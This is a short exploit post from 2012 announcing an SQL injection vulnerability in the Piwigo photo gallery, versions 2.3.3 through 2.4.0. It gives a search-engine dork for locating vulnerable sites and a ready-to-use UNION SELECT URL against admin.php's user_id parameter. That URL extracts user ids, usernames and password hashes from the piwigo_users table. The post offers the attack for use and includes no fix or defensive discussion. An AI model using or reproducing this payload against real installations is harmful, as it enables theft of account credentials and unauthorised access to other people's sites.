facebook facebook twitter rss

Piwigo Sql Injection Vulnerability

Author: Aboud-el , Published: 09-06-2012
Piwigo Sql Injection Vulnerability 
====================================================================

####################################################################
.:. Author : Aboud-EL [aboud_el@hotmail.com]
.:. Script : http://piwigo.org/
.:. Tested On Demo : http://demo.opensourcecms.com/piwigo/
.:. Version : 2.3.3 , 2.3.4 , 2.4.0
.:. Drok : "Powered by Piwigo "

####################################################################

===[ Exploit ]===


http://localhost/admin.php?page=profile&user_id=1[sql]

http://localhost/admin.php?page=profile&user_id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+piwigo_users

####################################################################

Like us on Facebook :